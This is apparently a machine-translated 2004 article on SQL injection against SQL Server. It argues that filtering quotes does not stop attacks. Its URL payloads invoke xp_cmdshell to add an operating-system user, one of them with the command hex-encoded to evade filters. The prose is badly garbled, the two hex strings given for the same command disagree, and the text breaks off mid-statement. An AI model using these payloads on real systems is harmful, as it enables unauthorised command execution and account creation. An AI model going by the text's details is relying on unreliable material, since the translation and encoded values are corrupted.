Author: angel article in Nature: Original release date: 2004-04-02 I think a lot of people have seen some articles about SQL Injection attacks against SQL Server, because of inadequate or no filter variable filter is constructed deformity SQL statements injection The "SQL Injection" is also an example of "SQL Injection", because there is no filtering, so it is quite easy to inject, as follows:
http://www.asp?id=1;Exec Master.dbo.xp_cmdshell 'Net User Angel Pass / Add'; - This often causes misunderstanding to everyone, think as long as the variable is filtered, ' Prevent SQL INJECTION attacks, this kind of consciousness is that a large number of programs can be injected into a disaster, in fact, filtering 'is not enough, in' filtered case, let's play, look at the following statement:
http://www.ilikeplmm.com/show.asp?id=1;declare @a sysname select @a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;-- is not Is there a big difference with the above sentence? However, the effect is exactly the same. In fact, these are SQL statements.
0x6e006500740072002000610065007200650061006E0067006500640060020002F00610064006400 This sentence is the 16-way format of "NET User Angel Pass / Add". Understanding SQL friends can easily understand, first declare a variable A, then assign our instruction to A, then call the variable A to eventually execute the commands we entered. Variable A can be any command. as follows:
Declare @a sysname select @ a =
